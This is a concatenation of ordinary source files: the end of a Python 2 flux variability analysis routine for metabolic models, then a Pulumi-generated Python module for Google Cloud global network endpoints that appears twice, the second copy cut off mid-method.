If True, it stores the identified bounds on reaciton fluxes in fva_flux_bounds. Otherwise
they are stored in a dictionary whose keys are ids and values are a list of two elements
in the form [fva_LB,fva_UB], whith fva_LB and fva_UB being the FVA LB and UB on fluxes
results_filename:
A string containing the name of the file to save the results in. If an empty string
is provided the results are not saved to a file
simulation_conditions:
A string describing simulation conditions
OUTPUTS:
--------
fva_flux_bounds:
A dictionary with keys being reactions ids and values beiing a list ot two elements
containing the fva flux bounds in the form [LB, UB]
<NAME> - Segre Lab @ Boston University
Last updated: 08-22-2017
"""
# save_to_model
if not isinstance(save_to_model,bool):
raise TypeError('save_to_model must be either True or False')
# selected_rxns
if not isinstance(selected_rxns,list) and not isinstance(selected_rxns, tuple):
raise userError('selected_rxns must be a list or tuple of reaction objects')
# optimization_solver
if not isinstance(optimization_solver,str):
raise TypeError('optimization_solver must be a string')
elif optimization_solver.lower() not in ['gurobi','cplex','gurobi_ampl','cplexamp']:
raise ValueError('Invalid value for optimization_solver. Allowed choices are gurobi and cplex')
# simulation_conditions
if not isinstance(simulation_conditions,str):
raise TypeError('simulation_conditions must be a string')
# warmstart
if not isinstance(warmstart,bool):
raise TypeError('use_warmsart must be either True or False')
# warnings and stdout_msgs
if not isinstance(warnings,bool):
raise TypeError('warnings must be either True or False')
if not isinstance(stdout_msgs,bool):
raise TypeError('stdout_msgs must be either True or False')
# If warmstart is True use gurobi_ampl
if warmstart and optimization_solver in ['gurobi', 'gurobi_ampl']:
optimization_solver = 'gurobi_ampl'
elif warmstart and optimization_solver not in ['gurobi', 'gurobi_ampl']:
# If the solver is not gurobi or gurobi_ampl warmstart should be turned off
# because other solvers such as gurobi will return an error (see fbaTools.py)
warmstart = False
print '**WARNING (fva.py)! warmstart was turned off becasue it can be used only with gurobi or gurobi_ampl as the solver. The specified solver ({}) does not support warmstart'.format(optimization_solver)
# A dictionary holding the FVA flux bounds
fva_flux_bounds = dict([(r.id,[None,None]) for r in model.reactions])
#--- Minimize rxn fluxes ---
for rxn in model.reactions:
rxn.objective_coefficient = 0
# Reactions to consider
if len(selected_rxns) == 0:
rxns_to_consider = model.reactions
else:
rxns_to_consider = selected_rxns
counter = 0
for rxn in rxns_to_consider:
counter += 1
rxn.objective_coefficient = 1
if counter == 1:
fba_model = fba(model = model, optimization_solver = optimization_solver, build_new_optModel = True, maximize = False, save_to_model = False, simulation_conditions = simulation_conditions, warmstart = warmstart, warmings = warnings, stdout_msgs = False, show_solver_output = False)
# From counter 2 on, turn off build_new_optModel and preprocessing and turn on warmstart
elif counter == 2:
fba_model.build_new_optModel = False
# Redefine the objective function if counter > 1
if counter > 1:
fba_model.optModel.del_component('objectiveFunc')
fba_model.optModel.objectiveFunc = environ.Objective(rule = fba_model.objectiveFunc_rule, sense = environ.minimize)
# Supply the current solution as the warm start
for j in fba_model.optModel.J:
fba_model.optModel.v[j] = fba_model.solution['opt_rxnFluxes'][j]
fba_model.run()
if fba_model.solution['exit_flag'] == 'globallyOptimal':
LB = fba_model.solution['objective_value']
else:
raise userError('fba problem to find LB for rxn {} in fva did not end with an optimal solution: exit_flag = {}'.format(rxn.id, fba_model.solution['exit_flag']))
# Store the results
if save_to_model:
rxn.fva_flux_bounds[0] = LB
else:
fva_flux_bounds[rxn.id][0] = LB
rxn.objective_coefficient = 0
#--- Maximize rxn flux ---
for rxn in model.reactions:
rxn.objective_coefficient = 0
counter = 0
for rxn in rxns_to_consider:
counter += 1
rxn.objective_coefficient = 1
if counter == 1:
fba_model = fba(model = model, optimization_solver = optimization_solver, build_new_optModel = True, maximize = True, save_to_model = False, simulation_conditions = simulation_conditions, warmstart = warmstart, warnings = warnings, stdout_msgs = False, show_solver_output = False)
# From counter 2 on, turn off build_new_optModel and preprocessing and turn on warmstart
elif counter == 2:
fba_model.build_new_optModel = False
# Redefine the objective function if counter > 1
if counter > 1:
fba_model.optModel.del_component('objectiveFunc')
fba_model.optModel.objectiveFunc = environ.Objective(rule = fba_model.objectiveFunc_rule, sense = environ.maximize)
# Supply the current solution as the warm start
for j in fba_model.optModel.J:
fba_model.optModel.v[j] = fba_model.solution['opt_rxnFluxes'][j]
fba_model.run()
if fba_model.solution['exit_flag'] == 'globallyOptimal':
UB = fba_model.solution['objective_value']
else:
raise userError('fba problem to find UB for rxn {} in fva ended with a non-optimal solution: exit_flag = {}'.format(rxn.id, fba_model.solution['exit_flag']))
# Store the results
if save_to_model:
rxn.fva_flux_bounds[1] = UB
else:
fva_flux_bounds[rxn.id][1] = UB
rxn.objective_coefficient = 0
# Save results into a file
if results_filename != '':
with open(results_filename,'w') as f:
f.write('fva_flux_bounds = {\n')
for rxn in fva_flux_bounds.keys():
f.write("'{}':{},\n".format(rxn, fva_flux_bounds[rxn]))
f.write('}')
# Return fva_flux_bounds if save_to_model is not True
return fva_flux_bounds | 0.462473 | 0.304571 |
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['GlobalNetworkEndpointArgs', 'GlobalNetworkEndpoint']
@pulumi.input_type
class GlobalNetworkEndpointArgs:
def __init__(__self__, *,
global_network_endpoint_group: pulumi.Input[str],
port: pulumi.Input[int],
fqdn: Optional[pulumi.Input[str]] = None,
ip_address: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a GlobalNetworkEndpoint resource.
:param pulumi.Input[str] global_network_endpoint_group: The global network endpoint group this endpoint is part of.
:param pulumi.Input[int] port: Port number of the external endpoint.
:param pulumi.Input[str] fqdn: Fully qualified domain name of network endpoint.
This can only be specified when network_endpoint_type of the NEG is INTERNET_FQDN_PORT.
:param pulumi.Input[str] ip_address: IPv4 address external endpoint.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
pulumi.set(__self__, "global_network_endpoint_group", global_network_endpoint_group)
pulumi.set(__self__, "port", port)
if fqdn is not None:
pulumi.set(__self__, "fqdn", fqdn)
if ip_address is not None:
pulumi.set(__self__, "ip_address", ip_address)
if project is not None:
pulumi.set(__self__, "project", project)
@property
@pulumi.getter(name="globalNetworkEndpointGroup")
def global_network_endpoint_group(self) -> pulumi.Input[str]:
"""
The global network endpoint group this endpoint is part of.
"""
return pulumi.get(self, "global_network_endpoint_group")
@global_network_endpoint_group.setter
def global_network_endpoint_group(self, value: pulumi.Input[str]):
pulumi.set(self, "global_network_endpoint_group", value)
@property
@pulumi.getter
def port(self) -> pulumi.Input[int]:
"""
Port number of the external endpoint.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: pulumi.Input[int]):
pulumi.set(self, "port", value)
@property
@pulumi.getter
def fqdn(self) -> Optional[pulumi.Input[str]]:
"""
Fully qualified domain name of network endpoint.
This can only be specified when network_endpoint_type of the NEG is INTERNET_FQDN_PORT.
"""
return pulumi.get(self, "fqdn")
@fqdn.setter
def fqdn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "fqdn", value)
@property
@pulumi.getter(name="ipAddress")
def ip_address(self) -> Optional[pulumi.Input[str]]:
"""
IPv4 address external endpoint.
"""
return pulumi.get(self, "ip_address")
@ip_address.setter
def ip_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_address", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@pulumi.input_type
class _GlobalNetworkEndpointState:
def __init__(__self__, *,
fqdn: Optional[pulumi.Input[str]] = None,
global_network_endpoint_group: Optional[pulumi.Input[str]] = None,
ip_address: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
project: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering GlobalNetworkEndpoint resources.
:param pulumi.Input[str] fqdn: Fully qualified domain name of network endpoint.
This can only be specified when network_endpoint_type of the NEG is INTERNET_FQDN_PORT.
:param pulumi.Input[str] global_network_endpoint_group: The global network endpoint group this endpoint is part of.
:param pulumi.Input[str] ip_address: IPv4 address external endpoint.
:param pulumi.Input[int] port: Port number of the external endpoint.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
if fqdn is not None:
pulumi.set(__self__, "fqdn", fqdn)
if global_network_endpoint_group is not None:
pulumi.set(__self__, "global_network_endpoint_group", global_network_endpoint_group)
if ip_address is not None:
pulumi.set(__self__, "ip_address", ip_address)
if port is not None:
pulumi.set(__self__, "port", port)
if project is not None:
pulumi.set(__self__, "project", project)
@property
@pulumi.getter
def fqdn(self) -> Optional[pulumi.Input[str]]:
"""
Fully qualified domain name of network endpoint.
This can only be specified when network_endpoint_type of the NEG is INTERNET_FQDN_PORT.
"""
return pulumi.get(self, "fqdn")
@fqdn.setter
def fqdn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "fqdn", value)
@property
@pulumi.getter(name="globalNetworkEndpointGroup")
def global_network_endpoint_group(self) -> Optional[pulumi.Input[str]]:
"""
The global network endpoint group this endpoint is part of.
"""
return pulumi.get(self, "global_network_endpoint_group")
@global_network_endpoint_group.setter
def global_network_endpoint_group(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "global_network_endpoint_group", value)
@property
@pulumi.getter(name="ipAddress")
def ip_address(self) -> Optional[pulumi.Input[str]]:
"""
IPv4 address external endpoint.
"""
return pulumi.get(self, "ip_address")
@ip_address.setter
def ip_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_address", value)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[int]]:
"""
Port number of the external endpoint.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "port", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
class GlobalNetworkEndpoint(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
fqdn: Optional[pulumi.Input[str]] = None,
global_network_endpoint_group: Optional[pulumi.Input[str]] = None,
ip_address: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
project: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
A Global Network endpoint represents a IP address and port combination that exists outside of GCP.
**NOTE**: Global network endpoints cannot be created outside of a
global network endpoint group.
To get more information about GlobalNetworkEndpoint, see:
* [API documentation](https://cloud.google.com/compute/docs/reference/rest/beta/networkEndpointGroups)
* How-to Guides
* [Official Documentation](https://cloud.google.com/load-balancing/docs/negs/)
## Example Usage
### Global Network Endpoint
```python
import pulumi
import pulumi_gcp as gcp
neg = gcp.compute.GlobalNetworkEndpointGroup("neg",
default_port=90,
network_endpoint_type="INTERNET_FQDN_PORT")
default_endpoint = gcp.compute.GlobalNetworkEndpoint("default-endpoint",
global_network_endpoint_group=neg.name,
fqdn="www.example.com",
port=90)
```
## Import
GlobalNetworkEndpoint can be imported using any of these accepted formats
```sh
$ pulumi import gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint default projects/{{project}}/global/networkEndpointGroups/{{global_network_endpoint_group}}/{{ip_address}}/{{fqdn}}/{{port}}
```
```sh
$ pulumi import gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint default {{project}}/{{global_network_endpoint_group}}/{{ip_address}}/{{fqdn}}/{{port}}
```
```sh
$ pulumi import gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint default {{global_network_endpoint_group}}/{{ip_address}}/{{fqdn}}/{{port}}
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] fqdn: Fully qualified domain name of network endpoint.
This can only be specified when network_endpoint_type of the NEG is INTERNET_FQDN_PORT.
:param pulumi.Input[str] global_network_endpoint_group: The global network endpoint group this endpoint is part of.
:param pulumi.Input[str] ip_address: IPv4 address external endpoint.
:param pulumi.Input[int] port: Port number of the external endpoint.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: GlobalNetworkEndpointArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
A Global Network endpoint represents a IP address and port combination that exists outside of GCP.
**NOTE**: Global network endpoints cannot be created outside of a
global network endpoint group.
To get more information about GlobalNetworkEndpoint, see:
* [API documentation](https://cloud.google.com/compute/docs/reference/rest/beta/networkEndpointGroups)
* How-to Guides
* [Official Documentation](https://cloud.google.com/load-balancing/docs/negs/)
## Example Usage
### Global Network Endpoint
```python
import pulumi
import pulumi_gcp as gcp
neg = gcp.compute.GlobalNetworkEndpointGroup("neg",
default_port=90,
network_endpoint_type="INTERNET_FQDN_PORT")
default_endpoint = gcp.compute.GlobalNetworkEndpoint("default-endpoint",
global_network_endpoint_group=neg.name,
fqdn="www.example.com",
port=90)
```
## Import
GlobalNetworkEndpoint can be imported using any of these accepted formats
```sh
$ pulumi import gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint default projects/{{project}}/global/networkEndpointGroups/{{global_network_endpoint_group}}/{{ip_address}}/{{fqdn}}/{{port}}
```
```sh
$ pulumi import gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint default {{project}}/{{global_network_endpoint_group}}/{{ip_address}}/{{fqdn}}/{{port}}
```
```sh
$ pulumi import gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint default {{global_network_endpoint_group}}/{{ip_address}}/{{fqdn}}/{{port}}
```
:param str resource_name: The name of the resource.
:param GlobalNetworkEndpointArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(GlobalNetworkEndpointArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
fqdn: Optional[pulumi.Input[str]] = None,
global_network_endpoint_group: Optional[pulumi.Input[str]] = None,
ip_address: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
project: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = GlobalNetworkEndpointArgs.__new__(GlobalNetworkEndpointArgs)
__props__.__dict__["fqdn"] = fqdn
if global_network_endpoint_group is None and not opts.urn:
raise TypeError("Missing required property 'global_network_endpoint_group'")
__props__.__dict__["global_network_endpoint_group"] = global_network_endpoint_group
__props__.__dict__["ip_address"] = ip_address
if port is None and not opts.urn:
raise TypeError("Missing required property 'port'")
__props__.__dict__["port"] = port
__props__.__dict__["project"] = project
super(GlobalNetworkEndpoint, __self__).__init__(
'gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
fqdn: Optional[pulumi.Input[str]] = None,
global_network_endpoint_group: Optional[pulumi.Input[str]] = None,
ip_address: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
project: Optional[pulumi.Input[str]] = None) -> 'GlobalNetworkEndpoint':
"""
Get an existing GlobalNetworkEndpoint resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] fqdn: Fully qualified domain name of network endpoint.
This can only be specified when network_endpoint_type of the NEG is INTERNET_FQDN_PORT.
:param pulumi.Input[str] global_network_endpoint_group: The global network endpoint group this endpoint is part of.
:param pulumi.Input[str] ip_address: IPv4 address external endpoint.
:param pulumi.Input[int] port: Port number of the external endpoint.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _GlobalNetworkEndpointState.__new__(_GlobalNetworkEndpointState)
__props__.__dict__["fqdn"] = fqdn
__props__.__dict__["global_network_endpoint_group"] = global_network_endpoint_group
__props__.__dict__["ip_address"] = ip_address
__props__.__dict__["port"] = port
__props__.__dict__["project"] = project
return GlobalNetworkEndpoint(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def fqdn(self) -> pulumi.Output[Optional[str]]:
"""
Fully qualified domain name of network endpoint.
This can only be specified when network_endpoint_type of the NEG is INTERNET_FQDN_PORT.
"""
return pulumi.get(self, "fqdn")
@property
@pulumi.getter(name="globalNetworkEndpointGroup")
def global_network_endpoint_group(self) -> pulumi.Output[str]:
"""
The global network endpoint group this endpoint is part of.
"""
return pulumi.get(self, "global_network_endpoint_group")
@property
@pulumi.getter(name="ipAddress")
def ip_address(self) -> pulumi.Output[Optional[str]]:
"""
IPv4 address external endpoint.
"""
return pulumi.get(self, "ip_address")
@property
@pulumi.getter
def port(self) -> pulumi.Output[int]:
"""
Port number of the external endpoint.
"""
return pulumi.get(self, "port")
@property
@pulumi.getter
def project(self) -> pulumi.Output[str]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project") | sdk/python/pulumi_gcp/compute/global_network_endpoint.py |
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['GlobalNetworkEndpointArgs', 'GlobalNetworkEndpoint']
@pulumi.input_type
class GlobalNetworkEndpointArgs:
def __init__(__self__, *,
global_network_endpoint_group: pulumi.Input[str],
port: pulumi.Input[int],
fqdn: Optional[pulumi.Input[str]] = None,
ip_address: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a GlobalNetworkEndpoint resource.
:param pulumi.Input[str] global_network_endpoint_group: The global network endpoint group this endpoint is part of.
:param pulumi.Input[int] port: Port number of the external endpoint.
:param pulumi.Input[str] fqdn: Fully qualified domain name of network endpoint.
This can only be specified when network_endpoint_type of the NEG is INTERNET_FQDN_PORT.
:param pulumi.Input[str] ip_address: IPv4 address external endpoint.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
pulumi.set(__self__, "global_network_endpoint_group", global_network_endpoint_group)
pulumi.set(__self__, "port", port)
if fqdn is not None:
pulumi.set(__self__, "fqdn", fqdn)
if ip_address is not None:
pulumi.set(__self__, "ip_address", ip_address)
if project is not None:
pulumi.set(__self__, "project", project)
@property
@pulumi.getter(name="globalNetworkEndpointGroup")
def global_network_endpoint_group(self) -> pulumi.Input[str]:
"""
The global network endpoint group this endpoint is part of.
"""
return pulumi.get(self, "global_network_endpoint_group")
@global_network_endpoint_group.setter
def global_network_endpoint_group(self, value: pulumi.Input[str]):
pulumi.set(self, "global_network_endpoint_group", value)
@property
@pulumi.getter
def port(self) -> pulumi.Input[int]:
"""
Port number of the external endpoint.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: pulumi.Input[int]):
pulumi.set(self, "port", value)
@property
@pulumi.getter
def fqdn(self) -> Optional[pulumi.Input[str]]:
"""
Fully qualified domain name of network endpoint.
This can only be specified when network_endpoint_type of the NEG is INTERNET_FQDN_PORT.
"""
return pulumi.get(self, "fqdn")
@fqdn.setter
def fqdn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "fqdn", value)
@property
@pulumi.getter(name="ipAddress")
def ip_address(self) -> Optional[pulumi.Input[str]]:
"""
IPv4 address external endpoint.
"""
return pulumi.get(self, "ip_address")
@ip_address.setter
def ip_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_address", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@pulumi.input_type
class _GlobalNetworkEndpointState:
def __init__(__self__, *,
fqdn: Optional[pulumi.Input[str]] = None,
global_network_endpoint_group: Optional[pulumi.Input[str]] = None,
ip_address: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
project: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering GlobalNetworkEndpoint resources.
:param pulumi.Input[str] fqdn: Fully qualified domain name of network endpoint.
This can only be specified when network_endpoint_type of the NEG is INTERNET_FQDN_PORT.
:param pulumi.Input[str] global_network_endpoint_group: The global network endpoint group this endpoint is part of.
:param pulumi.Input[str] ip_address: IPv4 address external endpoint.
:param pulumi.Input[int] port: Port number of the external endpoint.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
if fqdn is not None:
pulumi.set(__self__, "fqdn", fqdn)
if global_network_endpoint_group is not None:
pulumi.set(__self__, "global_network_endpoint_group", global_network_endpoint_group)
if ip_address is not None:
pulumi.set(__self__, "ip_address", ip_address)
if port is not None:
pulumi.set(__self__, "port", port)
if project is not None:
pulumi.set(__self__, "project", project)
@property
@pulumi.getter
def fqdn(self) -> Optional[pulumi.Input[str]]:
"""
Fully qualified domain name of network endpoint.
This can only be specified when network_endpoint_type of the NEG is INTERNET_FQDN_PORT.
"""
return pulumi.get(self, "fqdn")
@fqdn.setter
def fqdn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "fqdn", value)
@property
@pulumi.getter(name="globalNetworkEndpointGroup")
def global_network_endpoint_group(self) -> Optional[pulumi.Input[str]]:
"""
The global network endpoint group this endpoint is part of.
"""
return pulumi.get(self, "global_network_endpoint_group")
@global_network_endpoint_group.setter
def global_network_endpoint_group(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "global_network_endpoint_group", value)
@property
@pulumi.getter(name="ipAddress")
def ip_address(self) -> Optional[pulumi.Input[str]]:
"""
IPv4 address external endpoint.
"""
return pulumi.get(self, "ip_address")
@ip_address.setter
def ip_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_address", value)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[int]]:
"""
Port number of the external endpoint.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "port", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
class GlobalNetworkEndpoint(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
fqdn: Optional[pulumi.Input[str]] = None,
global_network_endpoint_group: Optional[pulumi.Input[str]] = None,
ip_address: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
project: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
A Global Network endpoint represents a IP address and port combination that exists outside of GCP.
**NOTE**: Global network endpoints cannot be created outside of a
global network endpoint group.
To get more information about GlobalNetworkEndpoint, see:
* [API documentation](https://cloud.google.com/compute/docs/reference/rest/beta/networkEndpointGroups)
* How-to Guides
* [Official Documentation](https://cloud.google.com/load-balancing/docs/negs/)
## Example Usage
### Global Network Endpoint
```python
import pulumi
import pulumi_gcp as gcp
neg = gcp.compute.GlobalNetworkEndpointGroup("neg",
default_port=90,
network_endpoint_type="INTERNET_FQDN_PORT")
default_endpoint = gcp.compute.GlobalNetworkEndpoint("default-endpoint",
global_network_endpoint_group=neg.name,
fqdn="www.example.com",
port=90)
```
## Import
GlobalNetworkEndpoint can be imported using any of these accepted formats
```sh
$ pulumi import gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint default projects/{{project}}/global/networkEndpointGroups/{{global_network_endpoint_group}}/{{ip_address}}/{{fqdn}}/{{port}}
```
```sh
$ pulumi import gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint default {{project}}/{{global_network_endpoint_group}}/{{ip_address}}/{{fqdn}}/{{port}}
```
```sh
$ pulumi import gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint default {{global_network_endpoint_group}}/{{ip_address}}/{{fqdn}}/{{port}}
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] fqdn: Fully qualified domain name of network endpoint.
This can only be specified when network_endpoint_type of the NEG is INTERNET_FQDN_PORT.
:param pulumi.Input[str] global_network_endpoint_group: The global network endpoint group this endpoint is part of.
:param pulumi.Input[str] ip_address: IPv4 address external endpoint.
:param pulumi.Input[int] port: Port number of the external endpoint.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: GlobalNetworkEndpointArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
A Global Network endpoint represents a IP address and port combination that exists outside of GCP.
**NOTE**: Global network endpoints cannot be created outside of a
global network endpoint group.
To get more information about GlobalNetworkEndpoint, see:
* [API documentation](https://cloud.google.com/compute/docs/reference/rest/beta/networkEndpointGroups)
* How-to Guides
* [Official Documentation](https://cloud.google.com/load-balancing/docs/negs/)
## Example Usage
### Global Network Endpoint
```python
import pulumi
import pulumi_gcp as gcp
neg = gcp.compute.GlobalNetworkEndpointGroup("neg",
default_port=90,
network_endpoint_type="INTERNET_FQDN_PORT")
default_endpoint = gcp.compute.GlobalNetworkEndpoint("default-endpoint",
global_network_endpoint_group=neg.name,
fqdn="www.example.com",
port=90)
```
## Import
GlobalNetworkEndpoint can be imported using any of these accepted formats
```sh
$ pulumi import gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint default projects/{{project}}/global/networkEndpointGroups/{{global_network_endpoint_group}}/{{ip_address}}/{{fqdn}}/{{port}}
```
```sh
$ pulumi import gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint default {{project}}/{{global_network_endpoint_group}}/{{ip_address}}/{{fqdn}}/{{port}}
```
```sh
$ pulumi import gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint default {{global_network_endpoint_group}}/{{ip_address}}/{{fqdn}}/{{port}}
```
:param str resource_name: The name of the resource.
:param GlobalNetworkEndpointArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(GlobalNetworkEndpointArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
fqdn: Optional[pulumi.Input[str]] = None,
global_network_endpoint_group: Optional[pulumi.Input[str]] = None,
ip_address: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
project: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = GlobalNetworkEndpointArgs.__new__(GlobalNetworkEndpointArgs)
__props__.__dict__["fqdn"] = fqdn
if global_network_endpoint_group is None and not opts.urn:
raise TypeError("Missing required property 'global_network_endpoint_group'")
__props__.__dict__["global_network_endpoint_group"] = global_network_endpoint_group
__props__.__dict__["ip_address"] = ip_address
if port is None and not opts.urn:
raise TypeError("Missing required property 'port'")
__props__.__dict__["port"] = port
__props__.__dict__["project"] = project
super(GlobalNetworkEndpoint, __self__).__init__(
'gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
fqdn: Optional[pulumi.Input[str]] = None,
global_network_endpoint_group: Optional[pulumi.Input[str]] = None,
ip_address: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
project: Optional[pulumi.Input[str]] = None) -> 'GlobalNetworkEndpoint':
"""
Get an existing GlobalNetworkEndpoint resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] fqdn: Fully qualified domain name of network endpoint.
This can only be specified when network_endpoint_type of the NEG is INTERNET_FQDN_PORT.
:param pulumi.Input[str] global_network_endpoint_group: The global network endpoint group this endpoint is part of.
:param pulumi.Input[str] ip_address: IPv4 address external endpoint.
:param pulumi.Input[int] port: Port number of the external endpoint.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
